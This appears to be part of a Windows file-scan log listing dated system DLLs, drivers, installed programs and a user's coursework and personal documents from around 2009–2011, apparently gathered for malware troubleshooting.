2011-03-09 03:44 - 2010-12-29 12:26 - 000177664 _____ (Microsoft Corporation) C:\Windows\system32\mpg2splt.ax
2011-03-09 03:44 - 2010-12-17 07:54 - 000677888 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2011-03-01 17:32 - 2009-07-10 05:47 - 000247808 _____ (Microsoft Corporation) C:\Windows\system32\shsvcs.dll
2011-02-24 04:01 - 2009-10-09 15:56 - 000002048 _____ (Microsoft Corporation) C:\Windows\system32\winrsmgr.dll
2011-02-24 04:00 - 2009-10-09 15:56 - 001181696 _____ (Microsoft Corporation) C:\Windows\system32\WsmSvc.dll
2011-02-24 04:00 - 2009-10-09 15:56 - 000246272 _____ (Microsoft Corporation) C:\Windows\system32\WSManHTTPConfig.exe
2011-02-24 04:00 - 2009-10-09 15:56 - 000241152 _____ (Microsoft Corporation) C:\Windows\system32\winrscmd.dll
2011-02-24 04:00 - 2009-10-09 15:56 - 000214016 _____ (Microsoft Corporation) C:\Windows\system32\WsmWmiPl.dll
2011-02-24 04:00 - 2009-10-09 15:56 - 000145408 _____ (Microsoft Corporation) C:\Windows\system32\WsmAuto.dll
2011-02-24 04:00 - 2009-10-09 15:56 - 000041472 _____ (Microsoft Corporation) C:\Windows\system32\pwrshplugin.dll
2011-02-24 04:00 - 2009-10-09 15:56 - 000040448 _____ (Microsoft Corporation) C:\Windows\system32\winrs.exe
2011-02-24 04:00 - 2009-10-09 15:56 - 000020480 _____ (Microsoft Corporation) C:\Windows\system32\winrshost.exe
2011-02-24 04:00 - 2009-10-09 15:56 - 000012800 _____ (Microsoft Corporation) C:\Windows\system32\wsmprovhost.exe
2011-02-24 04:00 - 2009-10-09 15:56 - 000010240 _____ (Microsoft Corporation) C:\Windows\system32\wsmplpxy.dll
2011-02-24 04:00 - 2009-10-09 15:56 - 000010240 _____ (Microsoft Corporation) C:\Windows\system32\winrssrv.dll
2011-02-24 04:00 - 2009-10-09 15:55 - 000252416 _____ (Microsoft Corporation) C:\Windows\system32\WSManMigrationPlugin.dll
2011-02-24 04:00 - 2009-10-09 15:55 - 000146944 _____ (Microsoft Corporation) C:\Windows\system32\wecsvc.dll
2011-02-24 04:00 - 2009-10-09 15:55 - 000081408 _____ (Microsoft Corporation) C:\Windows\system32\wevtfwd.dll
2011-02-24 04:00 - 2009-10-09 15:55 - 000079872 _____ (Microsoft Corporation) C:\Windows\system32\wecutil.exe
2011-02-24 04:00 - 2009-10-09 15:55 - 000056320 _____ (Microsoft Corporation) C:\Windows\system32\wecapi.dll
2011-02-24 04:00 - 2009-10-09 15:55 - 000054272 _____ (Microsoft Corporation) C:\Windows\system32\WsmRes.dll
2011-02-24 04:00 - 2009-08-01 00:27 - 000201184 _____ C:\Windows\system32\winrm.vbs
2011-02-24 04:00 - 2009-07-16 11:30 - 000004675 _____ C:\Windows\system32\wsmanconfig_schema.xml
2011-02-24 04:00 - 2009-07-16 11:30 - 000002426 _____ C:\Windows\system32\WsmTxt.xsl
2011-02-17 20:51 - 2011-02-17 20:53 - 000010067 _____ C:\Users\Angela\Documents\Vett 135 Practical exam 2 week 5.xlsx
2011-02-15 22:15 - 2011-02-15 22:15 - 000000000 ____D C:\Windows\en
2011-02-15 22:14 - 2011-03-31 03:04 - 000001229 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Live Photo Gallery.lnk
2011-02-15 22:14 - 2011-03-31 03:03 - 000002027 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Live Messenger.lnk
2011-02-15 22:14 - 2011-03-31 03:03 - 000001160 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Live Movie Maker.lnk
2011-02-15 22:12 - 2009-09-04 18:44 - 000515416 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_5.dll
2011-02-15 22:12 - 2009-09-04 18:44 - 000069464 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_3.dll
2011-02-15 22:12 - 2009-09-04 18:29 - 000453456 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_42.dll
2011-02-15 22:12 - 2006-11-29 14:06 - 003426072 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_32.dll
2011-02-15 21:32 - 2011-12-29 12:05 - 000127096 _____ (Symantec Corporation) C:\Windows\system32\Drivers\SYMEVENT.SYS
2011-02-15 21:32 - 2011-12-29 12:05 - 000007510 _____ C:\Windows\system32\Drivers\SYMEVENT.CAT
2011-02-15 21:31 - 2012-02-20 14:21 - 000000000 ____D C:\Windows\system32\Drivers\NAV
2011-02-15 21:31 - 2011-12-29 12:49 - 000000000 ____D C:\ProgramData\Norton
2011-02-10 13:48 - 2011-02-10 13:48 - 000178891 _____ C:\Users\Angela\Documents\Capstone_Project_Form_VETT_131_Spring_20.pdf
2011-02-10 01:16 - 2011-01-20 10:08 - 000478720 _____ (Microsoft Corporation) C:\Windows\system32\dxgi.dll
2011-02-10 01:16 - 2011-01-20 10:07 - 001075712 _____ (Microsoft Corporation) C:\Windows\system32\shdocvw.dll
2011-02-10 01:16 - 2011-01-20 10:07 - 000586240 _____ (Microsoft Corporation) C:\Windows\system32\stobject.dll
2011-02-10 01:16 - 2011-01-20 10:07 - 000258048 _____ (Microsoft Corporation) C:\Windows\system32\winspool.drv
2011-02-10 01:16 - 2011-01-20 10:06 - 002873344 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2011-02-10 01:16 - 2011-01-20 10:06 - 000026112 _____ (Microsoft Corporation) C:\Windows\system32\printfilterpipelineprxy.dll
2011-02-10 01:16 - 2011-01-20 10:04 - 000209920 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2011-02-10 01:16 - 2011-01-20 10:04 - 000098816 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2011-02-10 01:16 - 2011-01-20 08:28 - 001554432 _____ (Microsoft Corporation) C:\Windows\system32\xpsservices.dll
2011-02-10 01:16 - 2011-01-20 08:26 - 000667648 _____ (Microsoft Corporation) C:\Windows\system32\printfilterpipelinesvc.exe
2011-02-10 01:16 - 2011-01-20 08:25 - 000847360 _____ (Microsoft Corporation) C:\Windows\system32\OpcServices.dll
2011-02-10 01:16 - 2011-01-20 08:24 - 000135680 _____ (Microsoft Corporation) C:\Windows\system32\XpsRasterService.dll
2011-02-10 01:16 - 2011-01-20 08:15 - 000979456 _____ (Microsoft Corporation) C:\Windows\system32\MFH264Dec.dll
2011-02-10 01:16 - 2011-01-20 08:14 - 000357376 _____ (Microsoft Corporation) C:\Windows\system32\MFHEAACdec.dll
2011-02-10 01:16 - 2011-01-20 08:14 - 000302592 _____ (Microsoft Corporation) C:\Windows\system32\mfmp4src.dll
2011-02-10 01:16 - 2011-01-20 08:14 - 000261632 _____ (Microsoft Corporation) C:\Windows\system32\mfreadwrite.dll
2011-02-04 00:02 - 2011-02-17 20:53 - 000010002 _____ C:\Users\Angela\Documents\Vett 135 Practical exam 1 week 3.xlsx
2011-02-01 13:58 - 2011-02-03 14:43 - 000025600 _____ C:\Users\Angela\Documents\Vett 131_Week 3_FAQ_assignment_Angela_Vega.xls
2011-01-31 17:03 - 2011-01-31 17:03 - 000700520 _____ (Realtek Semiconductor Corporation ) C:\Windows\system32\Drivers\WNA1000M.sys
2011-01-12 05:29 - 2010-12-28 09:55 - 000413696 _____ (Microsoft Corporation) C:\Windows\system32\odbc32.dll
2011-01-12 05:29 - 2010-12-14 08:49 - 001169408 _____ (Microsoft Corporation) C:\Windows\system32\sdclt.exe
2011-01-09 21:18 - 2011-01-28 12:22 - 000008810 _____ C:\Users\Angela\Documents\Pet Expenses 2011.xlsx
2011-01-07 13:05 - 2011-01-07 13:05 - 000000000 ____D C:\Users\Angela\AppData\Local\Oberon Media
2011-01-07 04:02 - 2011-01-07 04:02 - 000001243 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Default Manager.lnk
2011-01-07 04:01 - 2011-03-12 04:01 - 000000000 ____D C:\Program Files\MSN Toolbar
2011-01-07 04:01 - 2011-01-07 04:01 - 000000000 ____D C:\Users\Default\AppData\Roaming\Mozilla
2011-01-07 04:01 - 2011-01-07 04:01 - 000000000 ____D C:\Users\Default User\AppData\Roaming\Mozilla
2010-12-15 08:12 - 2010-11-04 12:56 - 000345600 _____ (Microsoft Corporation) C:\Windows\system32\wmicmiplugin.dll
2010-12-15 08:12 - 2010-11-04 12:55 - 000601600 _____ (Microsoft Corporation) C:\Windows\system32\schedsvc.dll
2010-12-15 08:12 - 2010-11-04 12:55 - 000352768 _____ (Microsoft Corporation) C:\Windows\system32\taskschd.dll
2010-12-15 08:12 - 2010-11-04 12:55 - 000270336 _____ (Microsoft Corporation) C:\Windows\system32\taskcomp.dll
2010-12-15 08:12 - 2010-11-04 10:34 - 000171520 _____ (Microsoft Corporation) C:\Windows\system32\taskeng.exe
2010-12-15 08:11 - 2010-06-16 09:30 - 000072704 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll
2010-11-30 00:15 - 2010-11-30 00:15 - 000000000 ___DL C:\Users\Angela\AppData\LocalLow\PlayReady
2010-11-11 11:49 - 2012-01-26 22:21 - 000000000 ____D C:\Users\Angela\AppData\Local\Windows Live
2010-11-10 02:54 - 2010-11-10 02:54 - 000049016 _____ (Microsoft Corporation) C:\Windows\system32\sirenacm.dll
2010-11-09 18:31 - 2009-08-04 02:02 - 000754688 _____ (Microsoft Corporation) C:\Windows\system32\webservices.dll
2010-11-09 18:26 - 2018-10-29 10:54 - 000000000 ____D C:\Users\Angela\AppData\Roaming\FrostWire
2010-10-27 01:24 - 2010-08-26 10:34 - 001696256 _____ (Microsoft Corporation) C:\Windows\system32\gameux.dll
2010-10-25 14:25 - 2010-10-25 14:25 - 000449024 _____ C:\Users\Angela\Documents\Steph.sig
2010-10-23 14:23 - 2018-10-30 18:18 - 000000000 ___HD C:\ProgramData\CanonIJScan
2010-10-23 14:14 - 2010-10-23 14:14 - 000000000 ___HD C:\ProgramData\CanonIJEGV
2010-10-13 14:31 - 2010-09-06 10:20 - 000125952 _____ (Microsoft Corporation) C:\Windows\system32\srvsvc.dll
2010-10-13 14:31 - 2010-09-06 10:19 - 000017920 _____ (Microsoft Corporation) C:\Windows\system32\netevent.dll
2010-10-13 14:30 - 2010-08-26 10:37 - 000157184 _____ (Microsoft Corporation) C:\Windows\system32\t2embed.dll
2010-10-13 14:29 - 2010-08-31 09:46 - 000954752 _____ (Microsoft Corporation) C:\Windows\system32\mfc40.dll
2010-10-13 14:29 - 2010-08-31 09:46 - 000954288 _____ (Microsoft Corporation) C:\Windows\system32\mfc40u.dll
2010-10-13 14:28 - 2010-05-04 13:13 - 000231424 _____ (Microsoft Corporation) C:\Windows\system32\msshsq.dll
2010-10-13 14:27 - 2010-08-20 10:05 - 000867328 _____ (Microsoft Corporation) C:\Windows\system32\wmpmde.dll
2010-10-04 13:02 - 2018-10-30 11:03 - 000000000 ____D C:\Users\Angela\AppData\LocalLow\Macromedia
2010-09-14 15:30 - 2010-08-17 08:11 - 000128000 _____ (Microsoft Corporation) C:\Windows\system32\spoolsv.exe
2010-09-14 15:30 - 2010-04-05 11:02 - 000317952 _____ (Microsoft Corporation) C:\Windows\system32\MP4SDECD.DLL
2010-08-12 14:22 - 2010-09-15 05:50 - 000472808 _____ (Sun Microsystems, Inc.) C:\Windows\system32\deployJava1.dll
2010-08-11 04:43 - 2010-05-27 14:08 - 000081920 _____ (Radius Inc.) C:\Windows\system32\iccvid.dll
2010-08-11 04:41 - 2010-06-18 11:31 - 000036864 _____ (Microsoft Corporation) C:\Windows\system32\rtutils.dll
2010-07-11 16:47 - 2010-07-11 16:47 - 001846632 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_41.dll
2010-07-11 16:47 - 2010-07-11 16:47 - 000453456 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_41.dll
2010-06-25 22:02 - 2010-06-25 22:02 - 000000000 ____D C:\3fe8a8bc5f49ce6633501653d2b12367
2010-06-23 03:00 - 2009-11-08 10:55 - 000297808 _____ (Microsoft Corporation) C:\Windows\system32\mscoree.dll
2010-06-23 03:00 - 2009-11-08 10:55 - 000295264 _____ (Microsoft Corporation) C:\Windows\system32\PresentationHost.exe
2010-06-23 03:00 - 2009-11-08 10:55 - 000099176 _____ (Microsoft Corporation) C:\Windows\system32\PresentationHostProxy.dll
2010-06-23 03:00 - 2009-11-08 10:55 - 000049472 _____ (Microsoft Corporation) C:\Windows\system32\netfxperf.dll
2010-06-21 15:19 - 2010-06-21 15:19 - 000010392 _____ C:\Users\Angela\Documents\Vett_116_Week 7_Technique_chart_Angela_Vega.xlsx
2010-06-11 11:45 - 2010-04-05 11:01 - 000067072 _____ (Microsoft Corporation) C:\Windows\system32\asycfilt.dll
2010-06-08 12:33 - 2010-06-08 12:33 - 000000000 ____D C:\Program Files\Citrix
2010-06-08 12:32 - 2010-06-08 12:32 - 000103720 _____ C:\Users\Angela\GoToAssistDownloadHelper.exe
2010-06-08 12:32 - 2010-06-08 12:32 - 000000000 ____D C:\Users\Angela\AppData\Local\Citrix
2010-06-08 12:29 - 2010-06-08 12:32 - 000000000 ____D C:\Users\Angela\AppData\Local\Deployment
2010-06-08 12:29 - 2010-06-08 12:29 - 000000000 ____D C:\Users\Angela\AppData\Local\Apps\2.0
2010-06-06 19:40 - 2012-08-21 13:01 - 000106928 _____ (GEAR Software Inc.) C:\Windows\system32\GEARAspi.dll
2010-06-06 19:39 - 2010-06-06 19:40 - 000000000 ____D C:\ProgramData\{429CAD59-35B1-4DBC-BB6D-1DB246563521}
2010-06-05 03:01 - 2007-03-20 03:31 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2010-04-14 11:12 - 2010-01-21 09:05 - 000062464 _____ (Fraunhofer Institut Integrierte Schaltungen IIS) C:\Windows\system32\l3codeca.acm
2010-04-14 11:12 - 2009-04-11 00:27 - 000220672 _____ (Fraunhofer Institut Integrierte Schaltungen IIS) C:\Windows\system32\l3codecp.acm
2010-04-14 11:11 - 2010-02-18 07:30 - 000200704 _____ (Microsoft Corporation) C:\Windows\system32\iphlpsvc.dll
2010-04-14 11:11 - 2010-02-18 05:28 - 000025088 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tunnel.sys
2010-04-14 11:05 - 2010-01-13 11:34 - 000098304 _____ (Microsoft Corporation) C:\Windows\system32\cabview.dll
2010-04-14 10:50 - 2010-07-22 23:21 - 000000000 ____D C:\MAGICDVDCOPY_TEMP
2010-04-09 16:19 - 2010-04-09 16:34 - 000112128 _____ C:\Users\Angela\Documents\OZRYEL.sig
2010-04-09 16:13 - 2010-04-09 16:13 - 000047104 _____ C:\Users\Angela\Documents\HELENE.sig
2010-04-09 16:01 - 2010-04-09 16:01 - 000108032 _____ C:\Users\Angela\Documents\LAVINA.sig
2010-04-09 15:53 - 2010-04-09 15:55 - 000075264 _____ C:\Users\Angela\Documents\AVALANCHE.sig
2010-03-11 04:03 - 2010-02-20 17:06 - 000024064 _____ (Microsoft Corporation) C:\Windows\system32\nshhttp.dll
2010-03-11 04:02 - 2010-02-20 17:05 - 000030720 _____ (Microsoft Corporation) C:\Windows\system32\httpapi.dll
2010-03-11 04:02 - 2010-02-20 14:53 - 000411648 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\http.sys
2010-03-08 23:41 - 2010-03-08 23:41 - 000000000 ____D C:\ProgramData\WindowsSearch
2010-02-24 05:09 - 2010-01-25 06:00 - 000471552 _____ (Microsoft Corporation) C:\Windows\system32\secproc_isv.dll
2010-02-24 05:09 - 2010-01-25 06:00 - 000471552 _____ (Microsoft Corporation) C:\Windows\system32\secproc.dll
2010-02-24 05:09 - 2010-01-25 06:00 - 000152576 _____ (Microsoft Corporation) C:\Windows\system32\secproc_ssp_isv.dll
2010-02-24 05:09 - 2010-01-25 06:00 - 000152064 _____ (Microsoft Corporation) C:\Windows\system32\secproc_ssp.dll
2010-02-24 05:09 - 2010-01-25 05:58 - 000332288 _____ (Microsoft Corporation) C:\Windows\system32\msdrm.dll
2010-02-24 05:09 - 2010-01-25 02:21 - 000526336 _____ (Microsoft Corporation) C:\Windows\system32\RMActivate_isv.exe
2010-02-24 05:09 - 2010-01-25 02:21 - 000518144 _____ (Microsoft Corporation) C:\Windows\system32\RMActivate.exe
2010-02-24 05:09 - 2010-01-25 02:21 - 000347136 _____ (Microsoft Corporation) C:\Windows\system32\RMActivate_ssp.exe
2010-02-24 05:09 - 2010-01-25 02:21 - 000346624 _____ (Microsoft Corporation) C:\Windows\system32\RMActivate_ssp_isv.exe
2010-02-14 20:20 - 2010-02-14 20:20 - 000000000 ____D C:\ProgramData\Oberon Media
2010-02-10 08:16 - 2009-12-08 11:26 - 000030720 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpipreg.sys
2010-02-10 08:16 - 2009-12-04 12:30 - 000012288 _____ (Microsoft Corporation) C:\Windows\system32\tsbyuv.dll
2010-02-10 08:16 - 2009-12-04 12:28 - 000123904 _____ (Microsoft Corporation) C:\Windows\system32\msvfw32.dll
2010-02-10 08:16 - 2009-12-04 12:28 - 000082944 _____ (Microsoft Corporation) C:\Windows\system32\mciavi32.dll
2010-02-10 08:16 - 2009-12-04 12:28 - 000050176 _____ (Microsoft Corporation) C:\Windows\system32\iyuv_32.dll
2010-02-10 08:16 - 2009-12-04 12:28 - 000031744 _____ (Microsoft Corporation) C:\Windows\system32\msvidc32.dll
2010-02-10 08:16 - 2009-12-04 12:28 - 000022528 _____ (Microsoft Corporation) C:\Windows\system32\msyuv.dll
2010-02-10 08:16 - 2009-12-04 12:28 - 000013312 _____ (Microsoft Corporation) C:\Windows\system32\msrle32.dll
2010-02-10 08:16 - 2009-12-04 12:27 - 000091136 _____ (Microsoft Corporation) C:\Windows\system32\avifil32.dll
2010-01-30 15:50 - 2011-01-09 21:12 - 000013054 _____ C:\Users\Angela\Documents\Pet Expenses 2010.xlsx
2010-01-15 13:10 - 2013-05-31 13:14 - 000000000 __SHD C:\Users\Angela\AppData\Roaming\.#
2010-01-15 13:09 - 2010-01-15 13:09 - 000002268 _____ C:\Users\Angela\Desktop\An Illustrated Guide to Veterinary Medical Terminology, 3e .lnk
2010-01-15 13:09 - 2010-01-15 13:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Delmar Learning
2010-01-15 13:07 - 2010-01-15 13:07 - 000000000 ____D C:\Program Files\Delmar Learning
2010-01-05 15:00 - 2018-10-31 00:14 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon MX320 series Manual
2010-01-05 14:58 - 2008-10-26 06:00 - 000236032 _____ (CANON INC.) C:\Windows\system32\CNMLM9O.DLL
2010-01-05 14:58 - 2008-08-25 19:02 - 000015872 _____ (CANON INC.) C:\Windows\system32\CNHMCA.dll
2010-01-05 14:58 - 2008-07-02 14:10 - 000013568 _____ C:\Windows\system32\CNC1736D.TBL
2010-01-05 14:57 - 2008-09-25 13:19 - 000003584 _____ (Canon Inc.) C:\Windows\system32\CNCFLhTH.DLL
2010-01-05 14:57 - 2008-09-25 13:19 - 000003584 _____ (Canon Inc.) C:\Windows\system32\CNCFLhID.DLL
2010-01-05 14:57 - 2008-09-25 13:19 - 000003072 _____ (Canon Inc.) C:\Windows\system32\CNCFLhKR.DLL
2010-01-05 14:57 - 2008-09-25 13:19 - 000002560 _____ (Canon Inc.) C:\Windows\system32\CNCFLhTW.DLL
2010-01-05 14:57 - 2008-09-25 13:19 - 000002560 _____ (Canon Inc.) C:\Windows\system32\CNCFLhCN.DLL
2010-01-05 14:57 - 2008-09-25 13:18 - 000003584 _____ (Canon Inc.) C:\Windows\system32\CNCFLhSE.DLL
2010-01-05 14:57 - 2008-09-25 13:18 - 000003584 _____ (Canon Inc.) C:\Windows\system32\CNCFLhRU.DLL
2010-01-05 14:57 - 2008-09-25 13:18 - 000003584 _____ (Canon Inc.) C:\Windows\system32\CNCFLhPL.DLL
2010-01-05 14:57 - 2008-09-25 13:18 - 000003584 _____ (Canon Inc.) C:\Windows\system32\CNCFLhGR.DLL
2010-01-05 14:57 - 2008-09-25 13:18 - 000003584 _____ (Canon Inc.) C:\Windows\system32\CNCFLhFI.DLL
2010-01-05 14:57 - 2008-09-25 13:18 - 000003072 _____ (Canon Inc.) C:\Windows\system32\CNCFLhTR.DLL
2010-01-05 14:57 - 2008-09-25 13:18 - 000003072 _____ (Canon Inc.) C:\Windows\system32\CNCFLhNO.DLL
2010-01-05 14:57 - 2008-09-25 13:18 - 000003072 _____ (Canon Inc.) C:\Windows\system32\CNCFLhHU.DLL
2010-01-05 14:57 - 2008-09-25 13:18 - 000003072 _____ (Canon Inc.) C:\Windows\system32\CNCFLhDK.DLL
2010-01-05 14:57 - 2008-09-25 13:18 - 000003072 _____ (Canon Inc.) C:\Windows\system32\CNCFLhCZ.DLL
2010-01-05 14:57 - 2008-09-25 13:18 - 000003072 _____ (Canon Inc.) C:\Windows\system32\CNCFLhAR.DLL
2010-01-05 14:57 - 2008-09-25 13:17 - 000003584 _____ (Canon Inc.) C:\Windows\system32\CNCFLhPT.DLL
2010-01-05 14:57 - 2008-09-25 13:17 - 000003584 _____ (Canon Inc.) C:\Windows\system32\CNCFLhNL.DLL
2010-01-05 14:57 - 2008-09-25 13:17 - 000003584 _____ (Canon Inc.) C:\Windows\system32\CNCFLhIT.DLL
2010-01-05 14:57 - 2008-09-25 13:17 - 000003584 _____ (Canon Inc.) C:\Windows\system32\CNCFLhFR.DLL
2010-01-05 14:57 - 2008-09-25 13:17 - 000003584 _____ (Canon Inc.) C:\Windows\system32\CNCFLhES.DLL
2010-01-05 14:57 - 2008-09-25 13:17 - 000003584 _____ (Canon Inc.) C:\Windows\system32\CNCFLhDE.DLL
2010-01-05 14:57 - 2008-09-03 12:09 - 000225792 _____ (Canon Inc.) C:\Windows\system32\CNCF2Lh.DLL
2010-01-05 14:57 - 2008-09-03 12:02 - 000167936 _____ (Canon Inc.) C:\Windows\system32\CNCFMSh.EXE
2010-01-05 14:57 - 2008-09-03 12:01 - 000003584 _____ (Canon Inc.) C:\Windows\system32\CNCFLhUS.DLL
2010-01-05 14:57 - 2008-09-03 12:01 - 000003072 _____ (Canon Inc.) C:\Windows\system32\CNCFLhJP.DLL
2009-12-09 19:06 - 2009-10-07 05:36 - 000243712 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2009-12-08 18:02 - 2009-12-08 18:02 - 000000000 ____D C:\ProgramData\vsosdk
2009-12-06 13:42 - 2009-12-06 13:42 - 000000946 _____ C:\Users\Angela\Desktop\ImTOO DVD Creator.lnk
2009-12-06 13:42 - 2009-12-06 13:42 - 000000000 ____D C:\Users\Angela\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ImTOO
2009-12-06 13:42 - 2009-12-06 13:42 - 000000000 ____D C:\Program Files\ImTOO
2009-11-25 14:36 - 2009-11-25 14:36 - 000000000 ____D C:\Users\Angela\AppData\Local\MagicSoftware
2009-11-25 14:35 - 2011-04-26 22:27 - 000000000 ____D C:\Users\Angela\AppData\Roaming\Vso
2009-11-25 14:35 - 2009-11-25 14:35 - 000087608 _____ C:\Users\Angela\AppData\Roaming\inst.exe
2009-11-25 14:35 - 2009-11-25 14:35 - 000047360 _____ (VSO Software) C:\Windows\system32\Drivers\pcouffin.sys
2009-11-25 14:35 - 2009-11-25 14:35 - 000047360 _____ (VSO Software) C:\Users\Angela\AppData\Roaming\pcouffin.sys
2009-11-25 14:35 - 2009-11-25 14:35 - 000007887 _____ C:\Users\Angela\AppData\Roaming\pcouffin.cat
2009-11-25 05:05 - 2009-10-23 11:10 - 000714240 _____ (Microsoft Corporation) C:\Windows\system32\timedate.cpl
2009-11-25 02:04 - 2009-11-25 02:04 - 001060864 _____ (Microsoft Corporation) C:\Windows\system32\MFC71.dll
2009-11-25 02:04 - 2009-11-25 02:04 - 000499712 _____ (Microsoft Corporation) C:\Windows\system32\msvcp71.dll
2009-11-25 02:04 - 2009-11-25 02:04 - 000348160 _____ (Microsoft Corporation) C:\Windows\system32\msvcr71.dll
2009-11-17 04:20 - 2009-11-17 04:20 - 000000000 ____D C:\Program Files\Windows Portable Devices
2009-11-17 04:19 - 2009-11-17 04:19 - 000000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdFs_01_07_00.Wdf
2009-11-17 04:03 - 2009-09-24 20:07 - 000189440 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecsExt.dll
2009-11-17 04:03 - 2009-09-24 20:04 - 000321024 _____ (Microsoft Corporation) C:\Windows\system32\PhotoMetadataHandler.dll
2009-11-17 04:03 - 2009-09-24 19:33 - 000195584 _____ (Microsoft Corporation) C:\Windows\system32\dxdiagn.dll
2009-11-17 04:03 - 2009-09-24 19:32 - 000252928 _____ (Microsoft Corporation) C:\Windows\system32\dxdiag.exe
2009-11-17 04:03 - 2009-09-09 20:01 - 003023360 _____ (Microsoft Corporation) C:\Windows\system32\UIRibbon.dll
2009-11-17 04:03 - 2009-09-09 20:00 - 001164800 _____ (Microsoft Corporation) C:\Windows\system32\UIRibbonRes.dll
2009-11-17 04:03 - 2009-09-09 20:00 - 000092672 _____ (Microsoft Corporation) C:\Windows\system32\UIAnimation.dll
2009-11-17 04:02 - 2009-09-30 19:02 - 002537472 _____ (Microsoft Corporation) C:\Windows\system32\wpdshext.dll
2009-11-17 04:02 - 2009-09-30 19:02 - 000334848 _____ (Microsoft Corporation) C:\Windows\system32\PortableDeviceApi.dll
2009-11-17 04:02 - 2009-09-30 19:02 - 000087552 _____ (Microsoft Corporation) C:\Windows\system32\WPDShServiceObj.dll
2009-11-17 04:02 - 2009-09-30 19:02 - 000031232 _____ (Microsoft Corporation) C:\Windows\system32\BthMtpContextHandler.dll
2009-11-17 04:02 - 2009-09-30 19:02 - 000030208 _____ (Microsoft Corporation) C:\Windows\system32\WPDShextAutoplay.exe
2009-11-17 04:02 - 2009-09-30 19:01 - 000546816 _____ (Microsoft Corporation) C:\Windows\system32\wpd_ci.dll
2009-11-17 04:02 - 2009-09-30 19:01 - 000350208 _____ (Microsoft Corporation) C:\Windows\system32\WPDSp.dll
2009-11-17 04:02 - 2009-09-30 19:01 - 000226816 _____ (Microsoft Corporation) C:\Windows\system32\WpdMtp.dll
2009-11-17 04:02 - 2009-09-30 19:01 - 000196608 _____ (Microsoft Corporation) C:\Windows\system32\PortableDeviceWMDRM.dll
2009-11-17 04:02 - 2009-09-30 19:01 - 000160256 _____ (Microsoft Corporation) C:\Windows\system32\PortableDeviceTypes.dll
2009-11-17 04:02 - 2009-09-30 19:01 - 000100864 _____ (Microsoft Corporation) C:\Windows\system32\PortableDeviceClassExtension.dll
2009-11-17 04:02 - 2009-09-30 19:01 - 000081920 _____ (Microsoft Corporation) C:\Windows\system32\wpdbusenum.dll
2009-11-17 04:02 - 2009-09-30 19:01 - 000061952 _____ (Microsoft Corporation) C:\Windows\system32\WpdMtpUS.dll
2009-11-17 04:02 - 2009-09-30 19:01 - 000060928 _____ (Microsoft Corporation) C:\Windows\system32\PortableDeviceConnectApi.dll
2009-11-17 04:02 - 2009-09-30 19:01 - 000040448 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WpdUsb.sys
2009-11-17 04:02 - 2009-09-30 19:01 - 000033280 _____ (Microsoft Corporation) C:\Windows\system32\WpdConns.dll
2009-11-17 04:02 - 2009-09-24 19:31 - 000519680 _____ (Microsoft Corporation) C:\Windows\system32\d3d11.dll
2009-11-13 15:20 - 2007-03-20 04:16 - 000000000 ____D C:\Program Files\Microsoft Silverlight
2009-11-10 15:04 - 2009-08-10 06:35 - 000355328 _____ (Microsoft Corporation) C:\Windows\system32\WSDApi.dll
2009-10-28 03:09 - 2009-10-28 03:09 - 000000000 ____D C:\Windows\system32\vi-VN
2009-10-28 03:09 - 2009-10-28 03:09 - 000000000 ____D C:\Windows\system32\eu-ES
2009-10-28 03:09 - 2009-10-28 03:09 - 000000000 ____D C:\Windows\system32\ca-ES
2009-10-27 23:08 - 2009-10-27 23:08 - 000000000 ____D C:\Windows\system32\EventProviders
2009-10-27 16:29 - 2009-09-10 08:58 - 000310784 _____ (Microsoft Corporation) C:\Windows\system32\unregmp2.exe
2009-10-13 17:20 - 2009-09-04 05:41 - 000060928 _____ (Microsoft Corporation) C:\Windows\system32\msasn1.dll
2009-10-13 17:19 - 2009-05-08 06:53 - 000604672 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOD.DLL
2009-09-24 10:15 - 2009-04-11 00:28 - 002134528 _____ (Microsoft Corporation) C:\Windows\system32\FunctionDiscoveryFolder.dll
2009-09-24 10:15 - 2009-04-11 00:28 - 001081344 _____ (Microsoft Corporation) C:\Windows\system32\SLCExt.dll
2009-09-24 10:15 - 2009-04-11 00:27 - 003408896 _____ (Microsoft Corporation) C:\Windows\system32\SLsvc.exe
2009-09-24 10:15 - 2009-04-11 00:27 - 000065536 _____ (Microsoft Corporation) C:\Windows\system32\DevicePairingWizard.exe
2009-09-24 10:15 - 2009-04-10 23:03 - 012240896 _____ (Microsoft Corporation) C:\Windows\system32\NlsLexicons0007.dll
2009-09-24 10:15 - 2009-04-10 23:03 - 002644480 _____ (Microsoft Corporation) C:\Windows\system32\NlsLexicons0009.dll
2009-09-24 10:14 - 2009-04-11 00:33 - 000986600 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2009-09-24 10:14 - 2009-04-11 00:33 - 000926184 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2009-09-24 10:14 - 2009-04-11 00:33 - 000614376 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
